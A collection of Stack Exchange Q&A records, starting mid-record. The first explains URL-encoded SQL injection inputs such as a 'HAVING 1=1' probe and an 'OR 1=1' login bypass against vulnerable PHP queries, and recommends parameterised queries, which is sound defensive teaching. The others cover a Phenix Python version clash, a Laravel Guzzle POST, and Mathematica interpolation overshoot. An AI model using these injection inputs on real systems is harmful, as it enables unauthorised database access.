desired.\nAnswer: When this string is decoded from its url-encoded form it becomes the following:\n<code>25' having 1=1--\n<\/code>\nThis string, when placed as is into, for example, the following (PHP) database query function:\n<code>mysql_query(\"SELECT * FROM users WHERE username = '$username'\");\n<\/code>\nBecomes this:\n<code>mysql_query(\"SELECT * FROM users WHERE username = '25' having 1=1--'\");\n<\/code>\nNote here that the %27 (') breaks out of the argument in the WHERE clause and continues the executable part of the statement. The -- after 1=1 makes the rest of the statement a comment which is not executed.\nThe HAVING statement in SQL is supposed to be used within queries which use the GROUP BY operator, and should fail in queries which do not. My guess here is that this string is being used to check simply for the presence of an unsanitised variable which gets placed into an executed query.\nTo prevent this type of attack I would suggest using a good input sanitation function, or parameterised queries. The implementation of this depends on the programming environment in question.\nAddition: The normal use of 1=1 in SQL injection queries is to cause all rows to be returned, voiding any other WHERE conditions. 
An example input could be:\n<code>a' OR 1=1 --\n<\/code>\nWhen inserted as the $password parameter in a query such as:\n<code>SELECT * FROM users WHERE username = '$username' AND password = '$password'\n<\/code>\nThe statement becomes:\n<code>SELECT * FROM users WHERE username = 'mark' AND password = 'a' OR 1=1 --\n<\/code>\nThe resulting dataset will include all entries in the 'users' table, as 1=1 is always true.\nComment: This is called URL encoding (or apparently [Percent Encoding](http:\/\/en.wikipedia.org\/wiki\/Percent-encoding)). It is used so that characters which would normally interfere with the address bar (?, \/, etc) can be placed into URLs without being interpreted for their normal meaning.\nComment: @drjimbob Hrrrrrrk, I wouldn't ever trust that regex. For a start, what about cases where you _want_ to store content that might have apostrophes and other punctuation? Even if you're just sticking to alphanumeric content, you can still alter the behaviour of a query via injection of unexpected content, causing subtle potentially-exploitable bugs. Parameterised queries are the **only** proper solution, since they treat data as data and query language as query language; they're separate entitites entirely. If your DBMS or driver can't handle them, switch to one that can immediately.\nComment: Great, so what causes `%27` to be evaluated to `'`? What encoding is this and are there other encodings that I should be aware of?\nComment: @Jeff, the issue isn't really related to the encoding, rather it has to do with the fact the (decoded) parameter contains a quote, and isn't escaped.\nComment: Bound parameters aka parameterized query is the optimal solution. Its risky to trust any input sanitation you wrote yourself, as that's rolling your own security which is a bad idea and a clever attacker may be able to get through. Also bound parameters generally run faster, unless some queries benefit greatly from a different execution plan that a smart DB can figure out without bound parameters [[1]](http:\/\/use-the-index-luke.com\/sql\/where-clause\/bind-parameters). If thats the case, make sure your input sanitation just whitelists safe input; e.g., filters out chars not in `[A-Za-z0-9 ]`.\nComment: @Polynomial - I recommended bound parameters and in practice never encountered the situation where the pre-planned execution plan create a bottleneck that had to be fixed. Yes, my regex wouldn't let you search for `J.J.`, `Green-Ellis`, `O'Neill` or `Erd\u0151s` and coupled with bad SQL strings could fail (`SELECT * from mytable where name={user_input};` with no quotes around `'{user_input}'`). But a simple let's replace `'` with `\\'` may fail for complicated reasons (e.g., unicode characters got mapped to `'` or you didn't map `\\` to `\\\\`) or they found some way to bypass your input sanitation.\nAnswer: what you're seeing there is a fairly standard SQL Injection attack vector. The code it's adding can modify SQL statements if the input isn't handled correctly by the application (but I guess you worked that out from the title). There's a good description of the problem which mentions this vector in this paper from NGS\/NCC.\nIn terms of mitigating the problem you'll need to ensure that input to the application is appropriately validated or escaped so that it can't modify the underlying SQL queries to the database.\nA good place to start with this would be the OWASP SQL Injection Cheetsheet\nAnswer: The alternative to a parameterized query is to escape the input. 
How you do this correctly will depend on your platform and database. For example, on PHP and with the mysql database use mysql_real_escape_string(). Also, if you do this you must always use single quotes in the SQL, even for numbers. \nYou might think that you can just replace single quotes in a string to make it safe, but that is not sufficient. Single quotes can be represented in other ways. More detail here: Multibyte character exploits - PHP\/MySQL\n","meta":{"source":"security.stackexchange","title":"How do I prevent this type of SQL injection attack?","dup_signals":{}},"subset":"stackexchange"} +{"text":"\"This package should not be accessible on Python 3\" error\n\nQuestion: I installed phenix (phenix-installer-1.17.1-3660-intel-linux-2.6-x86_64-centos6) on my CentOS 7 system according the installation guide (https:\/\/www.phenix-online.org\/documentation\/install-setup-run.html). The original python version (\/usr\/bin\/python) in my system is 2.7.5, but I installed anaconda3, so the output of \"which python\" command is \"~\/software\/build\/anaconda3\/bin\/python\".\nI tried to study the p9-sad tutorial and run the command \"phenix.run_example p9-sad\", but it gave the following error information:\n<code>Examples to be run: p9-sad\n\nRunning PHENIX example: p9-sad Fri Jan 17 15:04:44 CST 2020\n\nWorking directory: \/home\/sunyp\/Documents\/tutorial\/PHENIX\/p9-sad\nStarting run now ... please wait a moment\nError processing line 1 of \/home\/sunyp\/software\/build\/anaconda3\/lib\/python3.7\/site-packages\/google_auth-1.7.1-py3.6-nspkg.pth:\n\nFatal Python error: initsite: Failed to import the site module\nTraceback (most recent call last):\n File \"\/home\/sunyp\/software\/build\/anaconda3\/lib\/python3.7\/site.py\", line 168, in addpackage\n exec(line)\n File \"<string>\", line 1, in <module>\n File \"\/home\/sunyp\/software\/build\/anaconda3\/lib\/python3.7\/importlib\/util.py\", line 14, in <module>\n from contextlib import contextmanager\n File \"\/home\/sunyp\/software\/build\/anaconda3\/lib\/python3.7\/contextlib.py\", line 5, in <module>\n from collections import deque\n File \"\/home\/sunyp\/software\/build\/anaconda3\/lib\/python3.7\/collections\/__init__.py\", line 27, in <module>\n from reprlib import recursive_repr as _recursive_repr\n File \"\/home\/sunyp\/software\/Phenix\/phenix-1.17.1-install\/phenix-1.17.1-3660\/conda_base\/lib\/python2.7\/site-packages\/reprlib\/__init__.py\", line 7, in <module>\n raise ImportError('This package should not be accessible on Python 3. '\nImportError: This package should not be accessible on Python 3. 
Either you are trying to run from the python-future src folder or your installation of python-future is corrupted.\n\nDuring handling of the above exception, another exception occurred:\n\nTraceback (most recent call last):\n File \"\/home\/sunyp\/software\/Phenix\/phenix-1.17.1-install\/phenix-1.17.1-3660\/build\/..\/conda_base\/lib\/python2.7\/site-packages\/site.py\", line 73, in <module>\n __boot()\n File \"\/home\/sunyp\/software\/Phenix\/phenix-1.17.1-install\/phenix-1.17.1-3660\/build\/..\/conda_base\/lib\/python2.7\/site-packages\/site.py\", line 22, in __boot\n loader.load_module('site')\n File \"\/home\/sunyp\/software\/build\/anaconda3\/lib\/python3.7\/site.py\", line 570, in <module>\n main()\n File \"\/home\/sunyp\/software\/build\/anaconda3\/lib\/python3.7\/site.py\", line 557, in main\n known_paths = addsitepackages(known_paths)\n File \"\/home\/sunyp\/software\/build\/anaconda3\/lib\/python3.7\/site.py\", line 349, in addsitepackages\n addsitedir(sitedir, known_paths)\n File \"\/home\/sunyp\/software\/build\/anaconda3\/lib\/python3.7\/site.py\", line 207, in addsitedir\n addpackage(sitedir, name, known_paths)\n File \"\/home\/sunyp\/software\/build\/anaconda3\/lib\/python3.7\/site.py\", line 178, in addpackage\n import traceback\n File \"\/home\/sunyp\/software\/build\/anaconda3\/lib\/python3.7\/traceback.py\", line 3, in <module>\n import collections\n File \"\/home\/sunyp\/software\/build\/anaconda3\/lib\/python3.7\/collections\/__init__.py\", line 27, in <module>\n from reprlib import recursive_repr as _recursive_repr\n File \"\/home\/sunyp\/software\/Phenix\/phenix-1.17.1-install\/phenix-1.17.1-3660\/conda_base\/lib\/python2.7\/site-packages\/reprlib\/__init__.py\", line 7, in <module>\n raise ImportError('This package should not be accessible on Python 3. '\nImportError: This package should not be accessible on Python 3. Either you are trying to run from the python-future src folder or your installation of python-future is corrupted.\n<\/code>\nDoes it mean that phenix requires python2 rather python3, but there is python3 in my system, so the error came out? And how to solve the problem? Thank you in advance.\nRegards,\nYeping Sun\nAnswer: Solely based on <code>\/home\/sunyp\/software\/Phenix\/phenix-1.17.1-install\/phenix-1.17.1-3660\/conda_base\/lib\/python2.7\/site-packages\/reprlib\/__init__.py<\/code> Phenix contains a Python 2.7 environment.\nYou could maybe try running your code with <code>\/home\/sunyp\/software\/Phenix\/phenix-1.17.1-install\/phenix-1.17.1-3660\/conda_base\/bin\/python<\/code> or something to use that Python interpreter, but it's hard to tell since Phenix source is not openly available.\nComment: Thank you. But how to set the the python interpreter to that shipped with Phenix?\nAnswer: Your environment probably contains path to python2.7.5\nCheck your <code>PYTHONPATH<\/code>\nThis doesn't work with Python 3 for obvious reasons. To remove it:\n<code>unset PYTHONPATH\n<\/code>\nComment: Thank you. 
I have tried \"unset PYTHONPATH\", but it doesn't work and the same error comes out.\nComment: Add the output of `env | egrep -i 'python|virtualenv'` to your question\n","meta":{"source":"stackoverflow","title":"\"This package should not be accessible on Python 3\" error","dup_signals":{}},"subset":"stackexchange"} +{"text":"Making Guzzle HTTP POST Request in Laravel\n\nQuestion: I am trying to make a post request to the example <code>url endpoint<\/code> but I keeping running into this weird error <code>\"The GET method is not supported for this route. Supported methods: POST.\"<\/code> Bellow is my code route and controller code:\nRoute Snippet:\n<code>Route::post('\/posts', 'PostController@store')->name('store');<\/code>\nController Snippet:\n<code>public function store(){\n $client = new \\GuzzleHttp\\Client();\n $url = \"https:\/\/cdc-npin.lndo.site\/api\/nhtd-event\/json\";\n $response = $client->post($url, [\n 'form_params' => [\n 'key1' => 'value1',\n 'key2' => 'value2',\n 'key3' => 'value3',\n 'key4' => 'value4',\n ]\n ]);\n dd($response\n<\/code>\nWhat am I not doing correctly??\nComment: Typo fix, it's `dd($response);` and not `dd($response`\nComment: Can you post the form that submits to this store method? I suspect the error is coming before you even get to the Guzzle client\nAnswer: This is not form value;\n<code>'form_params' => [\n 'key1' => 'value1',\n 'key2' => 'value2',\n 'key3' => 'value3',\n 'key4' => 'value4',\n ]\n<\/code>\nwith form values, controller looks like \n<code> public function store(Request $request){\n $client = new \\GuzzleHttp\\Client();\n $url = \"https:\/\/cdc-npin.lndo.site\/api\/nhtd-event\/json\";\n $response = $client->post($url, [\n 'form_params' => [\n 'first_name' => $request->get('first_name'),\n 'last_name' => $request->get('last_name'),\n 'email' => $request->get('email'),\n 'job_title' => $request->get('job_title'),\n 'city' => $request->get('city'),\n 'country' => $request->get('country')\n ]\n ]);\n dd($response);\n }\n<\/code>\nand the form looks like:\n<code><form method=\"post\" action=\"{{ route('store') }}\">\n @csrf\n <div class=\"form-group\"> \n <label for=\"first_name\">First Name:<\/label>\n <input type=\"text\" class=\"form-control\" name=\"first_name\"\/>\n <\/div>\n\n <div class=\"form-group\">\n <label for=\"last_name\">Last Name:<\/label>\n <input type=\"text\" class=\"form-control\" name=\"last_name\"\/>\n <\/div>\n\n <div class=\"form-group\">\n <label for=\"email\">Email:<\/label>\n <input type=\"text\" class=\"form-control\" name=\"email\"\/>\n <\/div>\n <div class=\"form-group\">\n <label for=\"city\">City:<\/label>\n <input type=\"text\" class=\"form-control\" name=\"city\"\/>\n <\/div>\n <div class=\"form-group\">\n <label for=\"country\">Country:<\/label>\n <input type=\"text\" class=\"form-control\" name=\"country\"\/>\n <\/div>\n <div class=\"form-group\">\n <label for=\"job_title\">Job Title:<\/label>\n <input type=\"text\" class=\"form-control\" name=\"job_title\"\/>\n <\/div> \n <button type=\"submit\" class=\"btn btn-primary-outline\">Add contact<\/button>\n <\/form>\n<\/code>\nComment: I'm not sure that this is the problem since it should be causing an error in template rendering but you have a typo in your form definition in the action attribute. `route(store')` should be `route('store')`\nComment: Not the cause of the problem definitely!\nAnswer: \"The GET method is not supported for this route. 
Supported methods: POST.\" Not is the output of \n<code>dd($reponse);\n<\/code>\nI guess that you have a problem with the Form that calls the route Post::store, your form seems like make a GET Request instead a POST Request, cause the error is from controller not of Guzzle.\nI see your form, the form and method is correct...\nWhat if you change the constructor of Guzzle by\n<code>$client = new \\GuzzleHttp\\Client();\n$response = $client->request('POST', 'https:\/\/cdc-npin.lndo.site\/api\/nhtd-event\/json', [\n 'form_params' => [\n 'first_name' => $request->get('first_name'),\n 'last_name' => $request->get('last_name'),\n 'email' => $request->get('email'),\n 'job_title' => $request->get('job_title'),\n 'city' => $request->get('city'),\n 'country' => $request->get('country')\n ]\n]);\n<\/code>\nComment: The error goes away when I remove `dd($reponse);` but when I visit my enpoint url, I don't see the newly submitted data. Why is my data not registering?\nComment: You make the endpoint? you can post here the Route and Controller that handle this URL https:\/\/cdc-npin.lndo.site\/api\/nhtd-event\/json ?\n","meta":{"source":"stackoverflow","title":"Making Guzzle HTTP POST Request in Laravel","dup_signals":{}},"subset":"stackexchange"} +{"text":"Interpolation[] gives negative values when all the initial data is positive\n\nQuestion: I have this data:\n<code> data4[100]={{99.98`, 1.477804748224006`}, {99.98010000000001`, \n 2365.0750456414803`}, {99.98020000000001`, \n 7388.983990539655`}, {99.9803`, 12214.415228382633`}, {99.9804`, \n 14703.728757320594`}, {99.9805`, \n 13833.517124715048`}, {99.98060000000001`, \n 9910.24843752318`}, {99.9807`, 4572.062808475352`}, {99.9808`, \n 570.8108232836022`}, {99.9809`, \n 1360.4394093799826`}, {99.98100000000001`, \n 10546.858200868768`}, {99.9811`, 31276.246551027016`}, {99.9812`, \n 65650.1254789103`}, {99.9813`, \n 114254.56416369356`}, {99.98140000000001`, \n 175877.45012692566`}, {99.9815`, 247463.43115736826`}, {99.9816`, \n 324324.10569403647`}, {99.9817`, 400585.6434020496`}, {99.9818`, \n 469822.1456480918`}, {99.9819`, 525795.5336175732`}, {99.982`, \n 563205.5837321972`}, {99.9821`, 578349.5929231215`}, {99.9822`, \n 569600.9007249621`}, {99.9823`, 537638.1255371793`}, {99.9824`, \n 485389.5506534906`}, {99.9825`, 417695.34242114425`}, {99.9826`, \n 340728.91596566234`}, {99.9827`, 261252.42488402053`}, {99.9828`, \n 185805.19866843504`}, {99.9829`, 119934.45681939927`}, {99.983`, \n 67573.04382586862`}, {99.98310000000001`, \n 30649.601122680797`}, {99.98320000000001`, \n 8984.93375823133`}, {99.98330000000001`, \n 488.57590847085385`}, {99.9834`, 1627.1205800512662`}, {99.9835`, \n 8096.737603320689`}, {99.98360000000001`, \n 15602.028881503466`}, {99.98370000000001`, \n 20626.473373518827`}, {99.9838`, 21078.87118582859`}, {99.9839`, \n 16715.90414629784`}, {99.98400000000001`, \n 9271.330417955402`}, {99.98410000000001`, \n 2263.4817347905678`}, {99.9842`, 499.00930637276855`}, {99.9843`, \n 9335.824909593328`}, {99.98440000000001`, \n 33805.42443036627`}, {99.98450000000001`, \n 77718.79959836493`}, {99.9846`, 142887.136511969`}, {99.9847`, \n 228577.00679417455`}, {99.9848`, 331290.87329430395`}, {99.9849`, \n 444921.04587067786`}, {99.985`, 561274.3394688623`}, {99.9851`, \n 670912.5821721719`}, {99.9852`, 764208.0275593415`}, {99.9853`, \n 832479.363953682`}, {99.9854`, 869058.3616487961`}, {99.9855`, \n 870142.0041714903`}, {99.9856`, 835310.0610613178`}, {99.9857`, \n 767630.5596346757`}, {99.9858`, 673329.9921983734`}, {99.9859`, 
\n 561064.1071001278`}, {99.986`, \n 440880.5960885422`}, {99.98610000000001`, \n 323009.09572123486`}, {99.98620000000001`, \n 216640.19370923933`}, {99.98630000000001`, \n 128859.40940812681`}, {99.9864`, 63883.29183825436`}, {99.9865`, \n 22704.86291029975`}, {99.98660000000001`, \n 3199.7311446716553`}, {99.98670000000001`, \n 679.7731520971815`}, {99.9868`, 8817.201777734488`}, {99.9869`, \n 20807.144107481454`}, {99.98700000000001`, \n 30599.608320206604`}, {99.98710000000001`, \n 34017.603224111605`}, {99.9872`, 29589.91591126962`}, {99.9873`, \n 18963.736616762995`}, {99.98740000000001`, \n 6819.466464542636`}, {99.98750000000001`, \n 280.1958293620077`}, {99.9876`, 7881.952610961169`}, {99.9877`, \n 38237.52969319436`}, {99.98780000000001`, \n 98576.85395021607`}, {99.9879`, 193372.72190030565`}, {99.988`, \n 323257.87767462275`}, {99.9881`, 484407.14150474017`}, {99.9882`, \n 668500.2152456209`}, {99.9883`, 863304.0960842049`}, {99.9884`, \n 1.0538288292973272`*^6}, {99.9885`, \n 1.223928369892497`*^6}, {99.9886`, \n 1.358151069349844`*^6}, {99.9887`, \n 1.4436018537197143`*^6}, {99.9888`, \n 1.471567167555936`*^6}, {99.9889`, \n 1.4386770107031108`*^6}, {99.989`, \n 1.3474337251571033`*^6}, {99.98910000000001`, \n 1.206018054152098`*^6}, {99.98920000000001`, \n 1.0273789719875318`*^6}, {99.98930000000001`, \n 827711.9871653258`}, {99.9894`, 624517.4470547661`}, {99.9895`, \n 434493.3112763912`}, {99.98960000000001`, \n 271546.2668802631`}, {99.98970000000001`, \n 145195.83424830047`}, {99.9898`, 59597.975846536276`}, {99.9899`, \n 13333.424807004074`}, {99.99000000000001`, \n 1.4778548374239222`}, {99.99010000000001`, \n 9546.365930991567`}, {99.9902`, 30136.213755790428`}, {99.9903`, \n 50329.26450484372`}, {99.99040000000001`, \n 61211.43650049187`}, {99.99050000000001`, \n 58181.79375774372`}, {99.9906`, 42100.992643598314`}, {99.9907`, \n 19598.506481051947`}, {99.99080000000001`, \n 2447.884102815886`}, {99.9909`, 6050.762474493852`}, {99.991`, \n 47201.991349865326`}, {99.9911`, 141421.66859646593`}, {99.9912`, \n 300218.0575426925`}, {99.9913`, 528675.9641149845`}, {99.9914`, \n 823741.4573664954`}, {99.9915`, 1.1734966999925314`*^6}, {99.9916`,\n 1.5575965311706052`*^6}, {99.9917`, \n 1.9488858632768858`*^6}, {99.9918`, \n 2.3160542286129966`*^6}, {99.9919`, \n 2.6270326145706433`*^6}, {99.992`, \n 2.852719932349058`*^6}, {99.99210000000001`, \n 2.970559905168779`*^6}, {99.99220000000001`, \n 2.9674852618802455`*^6}, {99.99230000000001`, \n 2.841809004691841`*^6}, {99.9924`, \n 2.6037657460238747`*^6}, {99.9925`, \n 2.2745765447930614`*^6}, {99.99260000000001`, \n 1.8841060333862316`*^6}, {99.99270000000001`, \n 1.4673760546494084`*^6}, {99.9928`, \n 1.060367506635195`*^6}, {99.9929`, \n 695658.25368346`}, {99.99300000000001`, \n 398489.99935574655`}, {99.99310000000001`, \n 183822.56119456282`}, {99.9932`, 54819.36240358618`}, {99.9933`, \n 3026.5354262167316`}, {99.99340000000001`, \n 10280.101486167212`}, {99.99350000000001`, \n 52131.584079556276`}, {99.9936`, 102354.42420546012`}, {99.9937`, \n 137914.54566184452`}, {99.99380000000001`, \n 143685.80534156234`}, {99.9939`, 116183.81624423101`}, {99.994`, \n 65685.81312699754`}, {99.9941`, 16293.259464495655`}, {99.9942`, \n 3757.7396592063697`}, {99.9943`, 71196.78022114829`}, {99.9944`, \n 263136.03241681046`}, {99.9945`, 618585.1966204251`}, {99.9946`, \n 1.1640471696468873`*^6}, {99.9947`, \n 1.9074421621634928`*^6}, {99.9948`, \n 2.833882410239052`*^6}, {99.9949`, 3.90405567313237`*^6}, {99.995`,\n 
5.055682072659491`*^6}, {99.99510000000001`, \n 6.208131261346862`*^6}, {99.99520000000001`, \n 7.269868799615699`*^6}, {99.99530000000001`, \n 8.1479962141799`*^6}, {99.9954`, 8.758813651212059`*^6}, {99.9955`,\n 9.038114802770944`*^6}, {99.99560000000001`, \n 8.949861198259037`*^6}, {99.99570000000001`, \n 8.491995143812856`*^6}, {99.9958`, \n 7.6984334207765255`*^6}, {99.9959`, \n 6.636718223481769`*^6}, {99.99600000000001`, \n 5.401335544570164`*^6}, {99.99610000000001`, \n 4.1032876411022553`*^6}, {99.9962`, \n 2.8570501793411407`*^6}, {99.9963`, \n 1.7664844156866106`*^6}, {99.99640000000001`, \n 911546.0560149102`}, {99.99650000000001`, \n 337687.72504541057`}, {99.9966`, 49662.31616212789`}, {99.9967`, \n 11014.220485333051`}, {99.99680000000001`, \n 149916.70067926153`}, {99.9969`, 371249.42592296394`}, {99.997`, \n 573985.0440702039`}, {99.9971`, 672172.6613239779`}, {99.9972`, \n 617162.7093132898`}, {99.9973`, 418298.5610825093`}, {99.9974`, \n 159190.11126375137`}, {99.9975`, 6889.055099344037`}, {99.9976`, \n 211857.28903701573`}, {99.9977`, 1.097445484728616`*^6}, {99.9978`,\n 3.038700743165044`*^6}, {99.9979`, \n 6.431489307696678`*^6}, {99.998`, \n 1.1654127256214151`*^7}, {99.99810000000001`, \n 1.9024725313095316`*^7}, {99.99820000000001`, \n 2.875825988533397`*^7}, {99.99830000000001`, \n 4.092775280583405`*^7}, {99.9984`, \n 5.5433955481785744`*^7}, {99.9985`, \n 7.198736932275228`*^7}, {99.99860000000001`, \n 9.010559231046714`*^7}, {99.99870000000001`, \n 1.0912756879132845`*^8}, {99.9988`, \n 1.2824493566283156`*^8}, {99.9989`, \n 1.4654876982895207`*^8}, {99.99900000000001`, \n 1.630887950398025`*^8}, {99.99910000000001`, \n 1.7694038798517886`*^8}, {99.9992`, \n 1.8727407690049762`*^8}, {99.9993`, \n 1.934212083241554`*^8}, {99.99940000000001`, \n 1.9493079448759955`*^8}, {99.99950000000001`, \n 1.9161105149283525`*^8}, {99.9996`, \n 1.8355199261690336`*^8}, {99.9997`, \n 1.7112742180357695`*^8}, {99.99980000000001`, \n 1.5497651606295362`*^8}, {99.9999`, \n 1.3598374683380157`*^8}, {100.`, \n 1.1509227841822496`*^8}, {100.0001`, \n 9.35316855233305`*^7}, {100.0002`, \n 7.231025004379873`*^7}, {100.0003`, \n 5.256660434840215`*^7}, {100.0004`, \n 3.521381099545413`*^7}, {100.0005`, \n 2.096762182207146`*^7}, {100.0006`, \n 1.0307175273951748`*^7}, {100.0007`, \n 3.443687074219937`*^6}, {100.0008`, \n 319172.0909938909`}, {100.0009`, 624886.4691508369`}, {100.001`, \n 3.839629652685036`*^6}, {100.00110000000001`, \n 9.282792159957027`*^6}, {100.00120000000001`, \n 1.617690363214594`*^7}, {100.00130000000001`, \n 2.371457960763766`*^7}, {100.0014`, \n 3.1123276998223003`*^7}, {100.00150000000001`, \n 3.772278285822957`*^7}, {100.00160000000001`, \n 4.297077901877572`*^7}, {100.00170000000001`, \n 4.649332297408372`*^7}, {100.0018`, \n 4.809858468949901`*^7}, {100.0019`, \n 4.777386804395814`*^7}, {100.00200000000001`, \n 4.566746227227442`*^7}, {100.00210000000001`, \n 4.205818439052258`*^7}, {100.0022`, \n 3.731643524344679`*^7}, {100.0023`, \n 3.186112453043561`*^7}, {100.00240000000001`, \n 2.611684639639511`*^7}, {100.00250000000001`, \n 2.0475351093277786`*^7}, {100.0026`, \n 1.526456928610898`*^7}, {100.0027`, \n 1.0727432825096259`*^7}, {100.00280000000001`, \n 7.01155356380699`*^6}, {100.0029`, \n 4.1696218231500047`*^6}, {100.003`, \n 2.1693002162992805`*^6}, {100.0031`, \n 910514.5775877895`}, {100.0032`, 247468.92969395986`}, {100.0033`, \n 12466.399693349336`}, {100.0034`, 38713.52052913366`}, {100.0035`, \n 179679.7590042069`}, {100.0036`, 
323213.6387249924`}, {100.0037`, \n 399394.1422363143`}, {100.0038`, 381919.9691393901`}, {100.0039`, \n 283614.326160101`}, {100.004`, \n 147264.125970723`}, {100.00410000000001`, \n 33457.5539198235`}, {100.00420000000001`, \n 7288.615010277445`}, {100.00430000000001`, \n 125771.23057228878`}, {100.0044`, \n 427548.6798790092`}, {100.00450000000001`, \n 926064.5824913883`}, {100.00460000000001`, \n 1.6068273548210126`*^6}, {100.00470000000001`, \n 2.428830198016985`*^6}, {100.0048`, \n 3.3296556940659885`*^6}, {100.0049`, \n 4.233355835687827`*^6}, {100.00500000000001`, \n 5.059908642966373`*^6}, {100.00510000000001`, \n 5.734928561736933`*^6}, {100.0052`, \n 6.198363502951681`*^6}, {100.0053`, \n 6.411118533755151`*^6}, {100.00540000000001`, \n 6.35887575814467`*^6}, {100.00550000000001`, \n 6.052779744495396`*^6}, {100.0056`, \n 5.527073307789168`*^6}, {100.0057`, \n 4.834148684727312`*^6}, {100.00580000000001`, \n 4.037775067693357`*^6}, {100.0059`, \n 3.2054465135499393`*^6}, {100.006`, \n 2.400845094917662`*^6}, {100.0061`, \n 1.6773369586025865`*^6}, {100.0062`, \n 1.0732294466178913`*^6}, {100.0063`, \n 609246.9462916934`}, {100.0064`, 288371.9280090763`}, {100.0065`, \n 97885.98961812796`}, {100.0066`, 13175.954352500674`}, {100.0067`, \n 2671.8581152992074`}, {100.0068`, 33180.8081956854`}, {100.0069`, \n 74879.15044292489`}, {100.007`, \n 105320.26006151935`}, {100.00710000000001`, \n 111989.1796066404`}, {100.00720000000001`, \n 93159.75531063265`}, {100.00730000000001`, \n 57054.633435510834`}, {100.0074`, \n 19538.03841524044`}, {100.00750000000001`, \n 758.3242056625403`}, {100.00760000000001`, \n 21277.671150084952`}, {100.00770000000001`, \n 98268.79276605384`}, {100.0078`, 242320.59325159696`}, {100.0079`, \n 455285.73967379465`}, {100.00800000000001`, \n 729441.1594492072`}, {100.00810000000001`, \n 1.0480410677191823`*^6}, {100.0082`, \n 1.3871489717460165`*^6}, {100.0083`, \n 1.7184649917589629`*^6}, {100.00840000000001`, \n 2.012740522166382`*^6}, {100.00850000000001`, \n 2.2433073813179927`*^6}, {100.0086`, \n 2.3892498069632286`*^6}, {100.0087`, \n 2.437811768754389`*^6}, {100.00880000000001`, \n 2.385747887226385`*^6}, {100.0089`, \n 2.239476243883074`*^6}, {100.009`, \n 2.0140542725085174`*^6}, {100.0091`, \n 1.7311522326453237`*^6}, {100.0092`, \n 1.4163228918969373`*^6}, {100.0093`, \n 1.095945353432984`*^6}, {100.0094`, \n 794247.1192294351`}, {100.0095`, 530779.7536792547`}, {100.0096`, \n 318646.5975802199`}, {100.0097`, 163667.62190115865`}, {100.0098`, \n 64533.7233387026`}, {100.0099`, 13868.84376476787`}, {100.01`, \n 1.4778114216281888`}}]\n<\/code>\nI can interpolate the data with\n<code>Clear[Interpolate]\nInterpolate[100] = Interpolation[data4[100], InterpolationOrder -> 2];\n<\/code>\nHowever, I noticed that <code>Interpolation[]<\/code> gives negative values in a small domain of my interpolation:\n<code>Plot[Interpolate[100][x], {x, 99.98, 100.01}, PlotRange -> All]\n<\/code>\n\n<code>Plot[Interpolate[100][x], {x, 100.0033, 100.0034}, \n PlotRange -> {-2*10^4, 0}]\n<\/code>\n\nWhy is <code>Interpolation[]<\/code> giving a negative value when none of the data gives negative values? I had looked at this question, which suggested adding <code>InterpolationOrder<\/code>, but unfortunately this solution had no effect.\nComment: Interpolation is in general not monotonic. There can be overshoot (see https:\/\/en.wikipedia.org\/wiki\/Runge's_phenomenon). 
You can enforce monotonicity by using 1st order interpolation, or https:\/\/en.wikipedia.org\/wiki\/Monotone_cubic_interpolation. As a side note, `Interpolate` is a very bad name for a variable!\nComment: Strongly related: \"[Monotone, periodic 1d-interpolation with continuous 1st order derivative](https:\/\/mathematica.stackexchange.com\/q\/14662\/280).\"\nAnswer: One good way to interpolate a function of this nature is to take its <code>Log<\/code>, interpolate, and take <code>Exp<\/code> of the result.\n<code>lntrp = Interpolation[data4[100] \/. {x_, y_} -> {x, Log[y]}]\nPlot[Exp[lntrp[x]], {x, 99.98, 100.01}, PlotRange -> All]\n<\/code>\nComment: This is a very good answer.\nAnswer: Too long for a comment to John Doty's answer: \nWhile the answer might suit your needs (i.e. a smooth curve that passes through your points and remains positive), I would not say that it is a good way of interpolating.\nIn the example below, I illustrate two bad properties of taking the exponential of log-interpolated values:\n\nsensitivity to vertical translation (the interpolation is sensitive to a vertical translation)\nsensitivity to small absolute variations near 0\n\nNaturally, these two \"properties\" are related.\n<code> data1 = {{0, 1}, {1, 10^-3}, {2, 1}};\n data2 = {{0, 1}, {1, 0}, {2, 1}} \/. {x_, y_} -> {x, y + 1};\n data3 = {{0, 1}, {1, 10^-5}, {2, 1}};\n<\/code>\nOne would expect interpolation of these three datasets to have quasi-exact same shapes. It is the case with \"classic\" interpolation:\n<code>int1 = Interpolation[data1, InterpolationOrder -> 2];\nint2 = Interpolation[data2, InterpolationOrder -> 2];\nint3 = Interpolation[data3, InterpolationOrder -> 2];\nPlot[{int1[t], int2[t] - 1, int3[t]}, {t, 0, 2}]\n<\/code>\n\nBut not at all with the \"Log-Exp trick\":\n<code>int4 = Interpolation[data1 \/. {x_, y_} -> {x, Log[y]}, InterpolationOrder -> 2];\nint5 = Interpolation[data2 \/. {x_, y_} -> {x, Log[y]}, InterpolationOrder -> 2];\nint6 = Interpolation[data3 \/. {x_, y_} -> {x, Log[y]}, InterpolationOrder -> 2];\nPlot[{Exp@int4[t], -1 + Exp@int5[t], Exp@int6[t]}, {t, 0, 2}]\n<\/code>\n\nSo maybe it is good enough for you in this case, but I would not recommend it generally speaking (and I would interrogate myself on the grounds to create an interpolation method that works only on a limited domain - positive values). \nComment: The problem is intrinsically unsymmetrical: zero is a line that must not be crossed, but there is no upper limit. Looking at the function, the peaks are rounded, but the valleys are nearly flat. The `Log` method reflects this, while you seem to insist that a proper method should not.\nComment: However, the `Log-Exp` pair can be replaced with any other functional pair such that $f(g(x))=x$ and $f(x)>0$ for domain of interest. For instance `g[x]=Sqrt[x]` and `f[x]=x^2`.\nComment: @yarchik Of course, but with the same drawback more or less amplified (based on the slope of $g$). Bottom line: what is the missing information that is sought between the known points? 
If the purpose of interpolating is to take the derivative, that could be a very bad strategy.\nAnswer: Linear interpolation doesn't show this over\/under-swinging behavior of polynomial interpolation of higher order.\n<code>Clear[Interpolate]\nInterpolate[100] = Interpolation[data4[100], InterpolationOrder -> 1];\n\nPlot[Interpolate[100][x], {x, 100.0033, 100.0034}, PlotRange -> {-2*10^4, +10*10^4}]\n<\/code>\n\nAlternatively, if you don't want to use linear interpolation you can use Akima Interpolation which gives very smooth results with little over\/undershooting.\n<code>f = ResourceFunction[\"AkimaInterpolation\"][data4[100]];\nPlot[f[x], {x, 99.98, 100.01}, PlotRange -> All]\n<\/code>\n\n<code>Plot[Interpolate[100][x], {x, 100.0033, 100.0034}, PlotRange -> {-2*10^4, +10*10^4}]\n<\/code>\nComment: +1 for `AkimaInterpolation` - I saw the author of that function give a talk on it a couple of days ago. Much more satisfying than the accepted 